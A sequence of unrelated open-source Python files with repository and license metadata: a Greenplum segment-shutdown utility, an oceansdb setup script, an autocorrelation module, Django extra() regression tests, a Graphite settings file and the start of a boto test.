self.assertTrue(type(sample) is list)
def test_agent_names(self):
names = geopmpy.agent.names()
expected = set(['power_balancer', 'power_governor',
'frequency_map', 'monitor'])
self.assertEqual(expected, set(names))
def test_json(self):
for agent in geopmpy.agent.names():
policy_names = geopmpy.agent.policy_names(agent)
exp_policy = {}
for pp in policy_names:
exp_policy[pp] = 'NAN'
policy_val = [float('nan')] * len(policy_names)
json_str = geopmpy.agent.policy_json(agent, policy_val)
res_policy = json.loads(json_str)
self.assertEqual(exp_policy, res_policy)
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
cjcjameson/gpdb
|
gpMgmt/sbin/gpsegstop.py
|
24
|
8204
|
#!/usr/bin/env python
#
# Copyright (c) Greenplum Inc 2008. All Rights Reserved.
#
#
# Internal Use Function.
#
#
#
# THIS IMPORT MUST COME FIRST
#
# import mainUtils FIRST to get python version check
from gppylib.mainUtils import *
import os, sys, time, signal
from optparse import Option, OptionGroup, OptionParser, OptionValueError, SUPPRESS_USAGE
from gppylib.gpparseopts import OptParser, OptChecker
from gppylib import gplog
from gppylib.commands import base
from gppylib.commands import unix
from gppylib.commands import gp
from gppylib.commands.gp import SEGMENT_STOP_TIMEOUT_DEFAULT
from gppylib.commands import pg
from gppylib.db import dbconn
from gppylib import pgconf
from gppylib.commands.gp import is_pid_postmaster
description = ("""
This utility is NOT SUPPORTED and is for internal-use only.
stops a set of one or more segment databases.
""")
logger = gplog.get_default_logger()
# -------------------------------------------------------------------------
class SegStopStatus:
def __init__(self, datadir, stopped, reason):
self.datadir = datadir
self.stopped = stopped
self.reason = reason
def __str__(self):
return "STATUS--DIR:%s--STOPPED:%s--REASON:%s" % (self.datadir, self.stopped, self.reason)
class SegStop(base.Command):
def __init__(self, name, db, mode, timeout):
self.name = name
self.db = db
self.mode = mode
self.timeout = timeout
self.result = None
self.port = None
self.datadir = None
self.logger = logger
base.Command.__init__(self, name=self.name, cmdStr='Stop an individual segment on the host', ctxt=None,
remoteHost=None)
def get_datadir_and_port(self):
return self.db.split(':')[0:2]
def get_results(self):
return self.result
def run(self):
try:
self.datadir, self.port = self.get_datadir_and_port()
cmd = gp.SegmentStop('segment shutdown', self.datadir, mode=self.mode, timeout=self.timeout)
cmd.run()
results = cmd.get_results()
is_shutdown = False
if results.rc == 0:
cmd = gp.SegmentIsShutDown('check if shutdown', self.datadir)
cmd.run()
if cmd.is_shutdown():
status = SegStopStatus(self.datadir, True, "Shutdown Succeeded")
self.result = status
is_shutdown = True
# MPP-16171
#
elif self.mode == 'immediate':
status = SegStopStatus(self.datadir, True, "Shutdown Immediate")
self.result = status
is_shutdown = True
# read pid and datadir from /tmp/.s.PGSQL.<port>.lock file
name = "failed segment '%s'" % self.db
(succeeded, mypid, file_datadir) = pg.ReadPostmasterTempFile.local(name, self.port).getResults()
if not is_shutdown:
if succeeded and file_datadir == self.datadir:
# now try to terminate the process, first trying with
# SIGTERM and working our way up to SIGABRT sleeping
# in between to give the process a moment to exit
#
unix.kill_sequence(mypid)
if not unix.check_pid(mypid):
lockfile = "/tmp/.s.PGSQL.%s" % self.port
if os.path.exists(lockfile):
self.logger.info("Clearing segment instance lock files")
os.remove(lockfile)
status = SegStopStatus(self.datadir, True,
"Forceful termination success: rc: %d stdout: %s stderr: %s." % (
results.rc, results.stdout, results.stderr))
try:
unix.kill_9_segment_processes(self.datadir, self.port, mypid)
if unix.check_pid(mypid) and mypid != -1:
status = SegStopStatus(self.datadir, False,
"Failed forceful termnation: rc: %d stdout: %s stderr: %s." % (
results.rc, results.stdout, results.stderr))
self.result = status
except Exception as e:
logger.error('Failed forceful termination of segment %s: (%s)' % (self.datadir, str(e)))
self.result = SegStopStatus(self.datadir, False,
'Failed forceful termination of segment! (%s)' % str(e))
return self.result
except Exception as e:
logger.exception(e)
self.result = SegStopStatus(self.datadir, False, 'Shutdown failed! %s' % str(e))
return self.result
# -------------------------------------------------------------------------
class GpSegStop:
######
def __init__(self, dblist, mode, gpversion, timeout=SEGMENT_STOP_TIMEOUT_DEFAULT, logfileDirectory=False):
self.dblist = dblist
self.mode = mode
self.expected_gpversion = gpversion
self.timeout = timeout
self.gphome = os.path.abspath(os.pardir)
self.actual_gpversion = gp.GpVersion.local('local GP software version check', self.gphome)
if self.actual_gpversion != self.expected_gpversion:
raise Exception("Local Software Version does not match what is expected.\n"
"The local software version is: '%s'\n"
"But we were expecting it to be: '%s'\n"
"Please review and correct" % (self.actual_gpversion, self.expected_gpversion))
self.logger = logger
self.pool = None
self.logfileDirectory = logfileDirectory
######
def run(self):
results = []
failures = []
self.logger.info("Issuing shutdown commands to local segments...")
self.pool = base.WorkerPool()
for db in self.dblist:
cmd = SegStop('segment shutdown', db=db, mode=self.mode, timeout=self.timeout)
self.pool.addCommand(cmd)
self.pool.join()
failed = False
for cmd in self.pool.getCompletedItems():
result = cmd.get_results()
if not result.stopped:
failed = True
results.append(result)
# Log the results!
status = '\nCOMMAND RESULTS\n'
for result in results:
status += str(result) + "\n"
self.logger.info(status)
return 1 if failed else 0
######
def cleanup(self):
if self.pool:
self.pool.haltWork()
@staticmethod
def createParser():
parser = OptParser(option_class=OptChecker,
description=' '.join(description.split()),
version='%prog version $Revision: #12 $')
parser.setHelp([])
addStandardLoggingAndHelpOptions(parser, includeNonInteractiveOption=False)
parser.add_option("-D", "--db", dest="dblist", action="append", type="string")
parser.add_option("-V", "--gp-version", dest="gpversion", metavar="GP_VERSION",
help="expected software version")
parser.add_option("-m", "--mode", dest="mode", metavar="<MODE>",
help="how to shutdown. modes are smart,fast, or immediate")
parser.add_option("-t", "--timeout", dest="timeout", type="int", default=SEGMENT_STOP_TIMEOUT_DEFAULT,
help="seconds to wait")
return parser
@staticmethod
def createProgram(options, args):
logfileDirectory = options.ensure_value("logfileDirectory", False)
return GpSegStop(options.dblist, options.mode, options.gpversion, options.timeout,
logfileDirectory=logfileDirectory)
# -------------------------------------------------------------------------
if __name__ == '__main__':
mainOptions = {'setNonuserOnToolLogger': True}
simple_main(GpSegStop.createParser, GpSegStop.createProgram, mainOptions)
|
apache-2.0
|
castelao/oceansdb
|
setup.py
|
1
|
1497
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from setuptools import setup
from codecs import open
with open('README.rst', encoding='utf-8') as f:
readme = f.read()
with open('HISTORY.rst', encoding='utf-8') as f:
history = f.read().replace('.. :changelog:', '')
with open('requirements.txt', encoding='utf-8') as f:
requirements = f.read()
setup(
name='oceansdb',
version='0.8.14',
description="Package to subsample ocean climatologies and reference data.",
long_description=readme + '\n\n' + history,
author="Guilherme Castelao",
author_email='[email protected]',
url='https://github.com/castelao/oceansdb',
packages=['oceansdb'],
package_dir={'oceansdb': 'oceansdb'},
include_package_data=True,
install_requires=requirements,
license='3-clause BSD',
zip_safe=False,
keywords='WOA World Ocean Atlas climatology oceanographic data' +
' oceanography ETOPO temperature salinity bathymetry',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering',
]
)
|
bsd-3-clause
|
mark-burnett/filament-dynamics
|
actin_dynamics/numerical/old_correlation.py
|
1
|
5017
|
# Copyright (C) 2011 Mark Burnett
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#import itertools
#import math
#
#import numpy
#
#def collection_stats(value_collection):
# all_vals = list(itertools.chain(*value_collection))
# mean = numpy.mean(all_vals)
# std = numpy.std(all_vals)
# return mean, std
#
## NOTE weighted_avg_and_std taken from EOL on StackOverflow
## http://stackoverflow.com/questions/2413522/weighted-std-in-numpy
#def weighted_avg_and_std(values, weights):
# """
# Returns the weighted average and standard deviation.
#
# values, weights -- Numpy ndarrays with the same shape.
# """
# average = numpy.average(values, weights=weights)
# variance = numpy.dot(weights, (values-average)**2)/weights.sum() # Fast and numerically precise
# return (average, math.sqrt(variance))
#
#
#def get_values_at_time(flat_data, time):
# results = []
# for times, values in flat_data:
# index = bisect.bisect_left(times, time)
# try:
# results.append(values[index])
# except IndexError:
# pass
# return results
#
#def aggregate_autocorrelation(sample_period, value_collection):
# big_sum = 0
# big_count = 0
# for single_values in value_collection:
# big_sum += sum(single_values)
# big_count += len(single_values)
# big_mean = float(big_sum) / big_count
# print 'BM', big_mean
#
# correlations = []
# counts = []
# for single_values in value_collection:
# ac_values, ac_counts = autocorrelate(single_values, mean=big_mean)
# correlations.append(ac_values)
# counts.append(ac_counts)
#
# maxlen = max(map(len, correlations))
# collated_acs = []
# collated_counts = []
# for i in xrange(maxlen):
# local_acs = []
# local_counts = []
# collated_acs.append(local_acs)
# collated_counts.append(local_counts)
# for acs, cts in itertools.izip(correlations, counts):
# if i < len(acs):
# local_acs.append(acs[i])
# local_counts.append(cts[i])
#
# taus = numpy.arange(maxlen) * sample_period
# ac_means = []
# ac_errors = []
# for acs, cts in itertools.izip(collated_acs, collated_counts):
# acs = numpy.array(acs)
# cts = numpy.array(cts)
# mean, std = weighted_avg_and_std(acs, cts)
# ctssum = float(cts.sum())
# # XXX This error is not representitive for small samples.
# error = std / math.sqrt(ctssum)
## if ctssum > 1:
## error = std / math.sqrt(ctssum)
## else:
## error = mean
# ac_means.append(mean)
# ac_errors.append(error)
#
# return taus, ac_means, ac_errors
#
#def autocorrelate(values, mean=1):
# values = numpy.array(values)
# result, count = correlate(values, values, mean=mean)
# results = [result]
# counts = [count]
# for i in xrange(1, len(values)):
# result, count = correlate(values[i:], values[:-i], mean=mean)
# results.append(result)
# counts.append(count)
# return results, counts
#
#def correlate(a, b, mean=1):
# length = len(a)
# return sum(a * b) / mean / float(length), length
import itertools
import numpy
def collection_stats(value_collection):
all_vals = numpy.fromiter(itertools.chain(*value_collection), dtype='double')
mean = numpy.mean(all_vals)
std = numpy.std(all_vals)
return mean, std
def aggregate_autocorrelation(sample_period, value_collection):
big_mean, big_std = collection_stats(value_collection)
correlation_collection = [autocorrelate(values, normalization=big_mean)
for values in value_collection]
maxlen = max(map(len, correlation_collection))
collated_correlations = []
for i in xrange(maxlen):
local_correlations = []
collated_correlations.append(local_correlations)
for correlations in correlation_collection:
if i < len(acs):
local_correlations.append(correlations[i])
taus = numpy.arange(maxlen) * sample_period
means = [numpy.mean(acs) for acs in collated_correlations]
return taus, means, [0 for t in taus]
def autocorrelate(values, normalization=1):
length = len(values)
values = numpy.array(values, dtype='double')
return numpy.correlate(values, values, mode='same')[length/2:] / (
length * normalization)
|
gpl-3.0
|
ytjiang/django
|
tests/extra_regress/tests.py
|
207
|
15018
|
from __future__ import unicode_literals
import datetime
from collections import OrderedDict
from django.contrib.auth.models import User
from django.test import TestCase
from .models import Order, RevisionableModel, TestObject
class ExtraRegressTests(TestCase):
def setUp(self):
self.u = User.objects.create_user(
username="fred",
password="secret",
email="[email protected]"
)
def test_regression_7314_7372(self):
"""
Regression tests for #7314 and #7372
"""
rm = RevisionableModel.objects.create(
title='First Revision',
when=datetime.datetime(2008, 9, 28, 10, 30, 0)
)
self.assertEqual(rm.pk, rm.base.pk)
rm2 = rm.new_revision()
rm2.title = "Second Revision"
rm.when = datetime.datetime(2008, 9, 28, 14, 25, 0)
rm2.save()
self.assertEqual(rm2.title, 'Second Revision')
self.assertEqual(rm2.base.title, 'First Revision')
self.assertNotEqual(rm2.pk, rm.pk)
self.assertEqual(rm2.base.pk, rm.pk)
# Queryset to match most recent revision:
qs = RevisionableModel.objects.extra(
where=["%(table)s.id IN (SELECT MAX(rev.id) FROM %(table)s rev GROUP BY rev.base_id)" % {
'table': RevisionableModel._meta.db_table,
}]
)
self.assertQuerysetEqual(qs,
[('Second Revision', 'First Revision')],
transform=lambda r: (r.title, r.base.title)
)
# Queryset to search for string in title:
qs2 = RevisionableModel.objects.filter(title__contains="Revision")
self.assertQuerysetEqual(qs2,
[
('First Revision', 'First Revision'),
('Second Revision', 'First Revision'),
],
transform=lambda r: (r.title, r.base.title),
ordered=False
)
# Following queryset should return the most recent revision:
self.assertQuerysetEqual(qs & qs2,
[('Second Revision', 'First Revision')],
transform=lambda r: (r.title, r.base.title),
ordered=False
)
def test_extra_stay_tied(self):
# Extra select parameters should stay tied to their corresponding
# select portions. Applies when portions are updated or otherwise
# moved around.
qs = User.objects.extra(
select=OrderedDict((("alpha", "%s"), ("beta", "2"), ("gamma", "%s"))),
select_params=(1, 3)
)
qs = qs.extra(select={"beta": 4})
qs = qs.extra(select={"alpha": "%s"}, select_params=[5])
self.assertEqual(
list(qs.filter(id=self.u.id).values('alpha', 'beta', 'gamma')),
[{'alpha': 5, 'beta': 4, 'gamma': 3}]
)
def test_regression_7957(self):
"""
Regression test for #7957: Combining extra() calls should leave the
corresponding parameters associated with the right extra() bit. I.e.
internal dictionary must remain sorted.
"""
self.assertEqual(
(User.objects
.extra(select={"alpha": "%s"}, select_params=(1,))
.extra(select={"beta": "%s"}, select_params=(2,))[0].alpha),
1
)
self.assertEqual(
(User.objects
.extra(select={"beta": "%s"}, select_params=(1,))
.extra(select={"alpha": "%s"}, select_params=(2,))[0].alpha),
2
)
def test_regression_7961(self):
"""
Regression test for #7961: When not using a portion of an
extra(...) in a query, remove any corresponding parameters from the
query as well.
"""
self.assertEqual(
list(User.objects
.extra(select={"alpha": "%s"}, select_params=(-6,))
.filter(id=self.u.id)
.values_list('id', flat=True)),
[self.u.id]
)
def test_regression_8063(self):
"""
Regression test for #8063: limiting a query shouldn't discard any
extra() bits.
"""
qs = User.objects.all().extra(where=['id=%s'], params=[self.u.id])
self.assertQuerysetEqual(qs, ['<User: fred>'])
self.assertQuerysetEqual(qs[:1], ['<User: fred>'])
def test_regression_8039(self):
"""
Regression test for #8039: Ordering sometimes removed relevant tables
from extra(). This test is the critical case: ordering uses a table,
but then removes the reference because of an optimization. The table
should still be present because of the extra() call.
"""
self.assertQuerysetEqual(
(Order.objects
.extra(where=["username=%s"], params=["fred"], tables=["auth_user"])
.order_by('created_by')),
[]
)
def test_regression_8819(self):
"""
Regression test for #8819: Fields in the extra(select=...) list
should be available to extra(order_by=...).
"""
self.assertQuerysetEqual(
User.objects.filter(pk=self.u.id).extra(select={'extra_field': 1}).distinct(),
['<User: fred>']
)
self.assertQuerysetEqual(
User.objects.filter(pk=self.u.id).extra(select={'extra_field': 1}, order_by=['extra_field']),
['<User: fred>']
)
self.assertQuerysetEqual(
User.objects.filter(pk=self.u.id).extra(select={'extra_field': 1}, order_by=['extra_field']).distinct(),
['<User: fred>']
)
def test_dates_query(self):
"""
When calling the dates() method on a queryset with extra selection
columns, we can (and should) ignore those columns. They don't change
the result and cause incorrect SQL to be produced otherwise.
"""
RevisionableModel.objects.create(
title='First Revision',
when=datetime.datetime(2008, 9, 28, 10, 30, 0)
)
self.assertQuerysetEqual(
RevisionableModel.objects.extra(select={"the_answer": 'id'}).datetimes('when', 'month'),
[datetime.datetime(2008, 9, 1, 0, 0)],
transform=lambda d: d,
)
def test_values_with_extra(self):
"""
Regression test for #10256... If there is a values() clause, Extra
columns are only returned if they are explicitly mentioned.
"""
obj = TestObject(first='first', second='second', third='third')
obj.save()
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values()),
[{'bar': 'second', 'third': 'third', 'second': 'second', 'whiz': 'third', 'foo': 'first', 'id': obj.pk, 'first': 'first'}]
)
# Extra clauses after an empty values clause are still included
self.assertEqual(
list(TestObject.objects.values().extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third'))))),
[{'bar': 'second', 'third': 'third', 'second': 'second', 'whiz': 'third', 'foo': 'first', 'id': obj.pk, 'first': 'first'}]
)
# Extra columns are ignored if not mentioned in the values() clause
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values('first', 'second')),
[{'second': 'second', 'first': 'first'}]
)
# Extra columns after a non-empty values() clause are ignored
self.assertEqual(
list(TestObject.objects.values('first', 'second').extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third'))))),
[{'second': 'second', 'first': 'first'}]
)
# Extra columns can be partially returned
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values('first', 'second', 'foo')),
[{'second': 'second', 'foo': 'first', 'first': 'first'}]
)
# Also works if only extra columns are included
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values('foo', 'whiz')),
[{'foo': 'first', 'whiz': 'third'}]
)
# Values list works the same way
# All columns are returned for an empty values_list()
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list()),
[('first', 'second', 'third', obj.pk, 'first', 'second', 'third')]
)
# Extra columns after an empty values_list() are still included
self.assertEqual(
list(TestObject.objects.values_list().extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third'))))),
[('first', 'second', 'third', obj.pk, 'first', 'second', 'third')]
)
# Extra columns ignored completely if not mentioned in values_list()
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('first', 'second')),
[('first', 'second')]
)
# Extra columns after a non-empty values_list() clause are ignored completely
self.assertEqual(
list(TestObject.objects.values_list('first', 'second').extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third'))))),
[('first', 'second')]
)
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('second', flat=True)),
['second']
)
# Only the extra columns specified in the values_list() are returned
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('first', 'second', 'whiz')),
[('first', 'second', 'third')]
)
# ...also works if only extra columns are included
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('foo', 'whiz')),
[('first', 'third')]
)
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('whiz', flat=True)),
['third']
)
# ... and values are returned in the order they are specified
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('whiz', 'foo')),
[('third', 'first')]
)
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('first', 'id')),
[('first', obj.pk)]
)
self.assertEqual(
list(TestObject.objects.extra(select=OrderedDict((('foo', 'first'), ('bar', 'second'), ('whiz', 'third')))).values_list('whiz', 'first', 'bar', 'id')),
[('third', 'first', 'second', obj.pk)]
)
def test_regression_10847(self):
"""
Regression for #10847: the list of extra columns can always be
accurately evaluated. Using an inner query ensures that as_sql() is
producing correct output without requiring full evaluation and
execution of the inner query.
"""
obj = TestObject(first='first', second='second', third='third')
obj.save()
self.assertEqual(
list(TestObject.objects.extra(select={'extra': 1}).values('pk')),
[{'pk': obj.pk}]
)
self.assertQuerysetEqual(
TestObject.objects.filter(
pk__in=TestObject.objects.extra(select={'extra': 1}).values('pk')
),
['<TestObject: TestObject: first,second,third>']
)
self.assertEqual(
list(TestObject.objects.values('pk').extra(select={'extra': 1})),
[{'pk': obj.pk}]
)
self.assertQuerysetEqual(
TestObject.objects.filter(
pk__in=TestObject.objects.values('pk').extra(select={'extra': 1})
),
['<TestObject: TestObject: first,second,third>']
)
self.assertQuerysetEqual(
TestObject.objects.filter(pk=obj.pk) | TestObject.objects.extra(where=["id > %s"], params=[obj.pk]),
['<TestObject: TestObject: first,second,third>']
)
def test_regression_17877(self):
"""
Ensure that extra WHERE clauses get correctly ANDed, even when they
contain OR operations.
"""
# Test Case 1: should appear in queryset.
t = TestObject(first='a', second='a', third='a')
t.save()
# Test Case 2: should appear in queryset.
t = TestObject(first='b', second='a', third='a')
t.save()
# Test Case 3: should not appear in queryset, bug case.
t = TestObject(first='a', second='a', third='b')
t.save()
# Test Case 4: should not appear in queryset.
t = TestObject(first='b', second='a', third='b')
t.save()
# Test Case 5: should not appear in queryset.
t = TestObject(first='b', second='b', third='a')
t.save()
# Test Case 6: should not appear in queryset, bug case.
t = TestObject(first='a', second='b', third='b')
t.save()
self.assertQuerysetEqual(
TestObject.objects.extra(
where=["first = 'a' OR second = 'a'", "third = 'a'"],
),
['<TestObject: TestObject: a,a,a>', '<TestObject: TestObject: b,a,a>'],
ordered=False
)
def test_extra_values_distinct_ordering(self):
t1 = TestObject.objects.create(first='a', second='a', third='a')
t2 = TestObject.objects.create(first='a', second='b', third='b')
qs = TestObject.objects.extra(
select={'second_extra': 'second'}
).values_list('id', flat=True).distinct()
self.assertQuerysetEqual(
qs.order_by('second_extra'), [t1.pk, t2.pk], lambda x: x)
self.assertQuerysetEqual(
qs.order_by('-second_extra'), [t2.pk, t1.pk], lambda x: x)
# Note: the extra ordering must appear in select clause, so we get two
# non-distinct results here (this is on purpose, see #7070).
self.assertQuerysetEqual(
qs.order_by('-second_extra').values_list('first', flat=True),
['a', 'a'], lambda x: x)
|
bsd-3-clause
|
bitpew/vagrant-graphite-apache2
|
provisioning/etc/graphite/local_settings.py
|
2
|
8300
|
## Graphite local_settings.py
# Edit this file to customize the default Graphite webapp settings
#
# Additional customizations to Django settings can be added to this file as well
#####################################
# General Configuration #
#####################################
# Set this to a long, random unique string to use as a secret key for this
# install. This key is used for salting of hashes used in auth tokens,
# CRSF middleware, cookie storage, etc. This should be set identically among
# instances if used behind a load balancer.
#SECRET_KEY = 'UNSAFE_DEFAULT'
# In Django 1.5+ set this to the list of hosts your graphite instances is
# accessible as. See:
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-ALLOWED_HOSTS
#ALLOWED_HOSTS = [ '*' ]
# Set your local timezone (Django's default is America/Chicago)
# If your graphs appear to be offset by a couple hours then this probably
# needs to be explicitly set to your local timezone.
TIME_ZONE = 'Europe/Berlin'
# Override this to provide documentation specific to your Graphite deployment
#DOCUMENTATION_URL = "http://graphite.readthedocs.org/"
# Logging
# True see: https://answers.launchpad.net/graphite/+question/159731
LOG_RENDERING_PERFORMANCE = False
LOG_CACHE_PERFORMANCE = False
LOG_METRIC_ACCESS = True
# Enable full debug page display on exceptions (Internal Server Error pages)
DEBUG = False
# If using RRD files and rrdcached, set to the address or socket of the daemon
#FLUSHRRDCACHED = 'unix:/var/run/rrdcached.sock'
# This lists the memcached servers that will be used by this webapp.
# If you have a cluster of webapps you should ensure all of them
# have the *exact* same value for this setting. That will maximize cache
# efficiency. Setting MEMCACHE_HOSTS to be empty will turn off use of
# memcached entirely.
#
# You should not use the loopback address (127.0.0.1) here if using clustering
# as every webapp in the cluster should use the exact same values to prevent
# unneeded cache misses. Set to [] to disable caching of images and fetched data
#MEMCACHE_HOSTS = ['10.10.10.10:11211', '10.10.10.11:11211', '10.10.10.12:11211']
#DEFAULT_CACHE_DURATION = 60 # Cache images and data for 1 minute
#####################################
# Filesystem Paths #
#####################################
# Change only GRAPHITE_ROOT if your install is merely shifted from /opt/graphite
# to somewhere else
GRAPHITE_ROOT = '/usr/share/graphite-web'
# Most installs done outside of a separate tree such as /opt/graphite will only
# need to change these three settings. Note that the default settings for each
# of these is relative to GRAPHITE_ROOT
CONF_DIR = '/etc/graphite'
STORAGE_DIR = '/var/lib/graphite/whisper'
CONTENT_DIR = '/usr/share/graphite-web/static'
# To further or fully customize the paths, modify the following. Note that the
# default settings for each of these are relative to CONF_DIR and STORAGE_DIR
#
## Webapp config files
#DASHBOARD_CONF = '/opt/graphite/conf/dashboard.conf'
#GRAPHTEMPLATES_CONF = '/opt/graphite/conf/graphTemplates.conf'
## Data directories
# NOTE: If any directory is unreadable in DATA_DIRS it will break metric browsing
WHISPER_DIR = '/var/lib/graphite/whisper'
#RRD_DIR = '/opt/graphite/storage/rrd'
#DATA_DIRS = [WHISPER_DIR, RRD_DIR] # Default: set from the above variables
LOG_DIR = '/var/log/graphite'
INDEX_FILE = '/var/lib/graphite/search_index' # Search index file
#####################################
# Email Configuration #
#####################################
# This is used for emailing rendered Graphs
# Default backend is SMTP
#EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
#EMAIL_HOST = 'localhost'
#EMAIL_PORT = 25
#EMAIL_HOST_USER = ''
#EMAIL_HOST_PASSWORD = ''
#EMAIL_USE_TLS = False
# To drop emails on the floor, enable the Dummy backend:
#EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'
#####################################
# Authentication Configuration #
#####################################
## LDAP / ActiveDirectory authentication setup
#USE_LDAP_AUTH = True
#LDAP_SERVER = "ldap.mycompany.com"
#LDAP_PORT = 389
# OR
#LDAP_URI = "ldaps://ldap.mycompany.com:636"
#LDAP_SEARCH_BASE = "OU=users,DC=mycompany,DC=com"
#LDAP_BASE_USER = "CN=some_readonly_account,DC=mycompany,DC=com"
#LDAP_BASE_PASS = "readonly_account_password"
#LDAP_USER_QUERY = "(username=%s)" #For Active Directory use "(sAMAccountName=%s)"
#
# If you want to further customize the ldap connection options you should
# directly use ldap.set_option to set the ldap module's global options.
# For example:
#
#import ldap
#ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
#ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, "/etc/ssl/ca")
#ldap.set_option(ldap.OPT_X_TLS_CERTFILE, "/etc/ssl/mycert.pem")
#ldap.set_option(ldap.OPT_X_TLS_KEYFILE, "/etc/ssl/mykey.pem")
# See http://www.python-ldap.org/ for further details on these options.
## REMOTE_USER authentication. See: https://docs.djangoproject.com/en/dev/howto/auth-remote-user/
#USE_REMOTE_USER_AUTHENTICATION = True
# Override the URL for the login link (e.g. for django_openid_auth)
#LOGIN_URL = '/account/login'
##########################
# Database Configuration #
##########################
# By default sqlite is used. If you cluster multiple webapps you will need
# to setup an external database (such as MySQL) and configure all of the webapp
# instances to use the same database. Note that this database is only used to store
# Django models such as saved graphs, dashboards, user preferences, etc.
# Metric data is not stored here.
#
# DO NOT FORGET TO RUN 'manage.py syncdb' AFTER SETTING UP A NEW DATABASE
#
# The following built-in database engines are available:
# django.db.backends.postgresql # Removed in Django 1.4
# django.db.backends.postgresql_psycopg2
# django.db.backends.mysql
# django.db.backends.sqlite3
# django.db.backends.oracle
#
# The default is 'django.db.backends.sqlite3' with file 'graphite.db'
# located in STORAGE_DIR
#
DATABASES = {
'default': {
'NAME': '/var/lib/graphite/graphite.db',
'ENGINE': 'django.db.backends.sqlite3',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': ''
}
}
#########################
# Cluster Configuration #
#########################
# (To avoid excessive DNS lookups you want to stick to using IP addresses only in this entire section)
#
# This should list the IP address (and optionally port) of the webapp on each
# remote server in the cluster. These servers must each have local access to
# metric data. Note that the first server to return a match for a query will be
# used.
#CLUSTER_SERVERS = ["10.0.2.2:80", "10.0.2.3:80"]
## These are timeout values (in seconds) for requests to remote webapps
#REMOTE_STORE_FETCH_TIMEOUT = 6 # Timeout to fetch series data
#REMOTE_STORE_FIND_TIMEOUT = 2.5 # Timeout for metric find requests
#REMOTE_STORE_RETRY_DELAY = 60 # Time before retrying a failed remote webapp
#REMOTE_FIND_CACHE_DURATION = 300 # Time to cache remote metric find results
## Remote rendering settings
# Set to True to enable rendering of Graphs on a remote webapp
#REMOTE_RENDERING = True
# List of IP (and optionally port) of the webapp on each remote server that
# will be used for rendering. Note that each rendering host should have local
# access to metric data or should have CLUSTER_SERVERS configured
#RENDERING_HOSTS = []
#REMOTE_RENDER_CONNECT_TIMEOUT = 1.0
# If you are running multiple carbon-caches on this machine (typically behind a relay using
# consistent hashing), you'll need to list the ip address, cache query port, and instance name of each carbon-cache
# instance on the local machine (NOT every carbon-cache in the entire cluster). The default cache query port is 7002
# and a common scheme is to use 7102 for instance b, 7202 for instance c, etc.
#
# You *should* use 127.0.0.1 here in most cases
#CARBONLINK_HOSTS = ["127.0.0.1:7002:a", "127.0.0.1:7102:b", "127.0.0.1:7202:c"]
#CARBONLINK_TIMEOUT = 1.0
#####################################
# Additional Django Settings #
#####################################
# Uncomment the following line for direct access to Django settings such as
# MIDDLEWARE_CLASSES or APPS
#from graphite.app_settings import *
|
apache-2.0
|
darjus-amzn/boto
|
tests/integration/storage_uri/test_storage_uri.py
|
132
|
2355
|
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
